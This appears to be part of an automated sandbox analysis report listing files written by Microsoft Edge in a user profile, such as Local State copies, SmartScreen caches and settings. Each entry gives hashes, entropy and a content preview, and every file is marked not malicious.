                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF490e2.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4ecdd.TMP (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44170
                                                                                                                                                                                                                                                                          Entropy (8bit):6.090538788133146
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kgCLmZt+tR96hOxq4gFkFDlwWE7RTupzKscDX//NPCh:z/Ps+wsI7ynxtGhOxqQoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:34043B0C78EB2698EC87042AA0C7549B
                                                                                                                                                                                                                                                                          SHA1:251A05BC7E12413AB3CCA7A62E40352242ABC56C
                                                                                                                                                                                                                                                                          SHA-256:051568528CBA91CEFBC3E556D42DB5A5E047D5B56C7B5C1005161A8CC898F608
                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                          MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                          SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                          SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                          SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):47
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                          MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                          SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                          SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                          SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):35
                                                                                                                                                                                                                                                                          Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                          MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                          SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                          SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                          SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):81
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                          MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                          SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                          SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                          SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):130439
                                                                                                                                                                                                                                                                          Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                          MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                          SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                          SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                          SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                          Entropy (8bit):5.0315676499554405
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTIBeYVn:YWLSGTt1o9LuLgfGBPAzkVj/T8lUZV
                                                                                                                                                                                                                                                                          MD5:8930E3B54842F242422FF4040C08DF49
                                                                                                                                                                                                                                                                          SHA1:E3EF525954C3D1BEB0C3761D7ED9AADE318F6353
                                                                                                                                                                                                                                                                          SHA-256:F959CF6242423F16A8D77DAFC267666165BAF2F186BC48E9DF001A65557EF3D1
                                                                                                                                                                                                                                                                          SHA-512:66765920D730D256A901A9D5D274DABA0BE2A49682E7A5E49DD24D3945E8CDFB81020DD7B548057FA77FB36028A9E103081894C846A1C92AD0B4CA896B3AA79C
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736531739348476}]}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c16d6f3c-d012-4624-ac28-651b64b56b18.tmp

                                                                                                                                                                                                                                                                          Download File
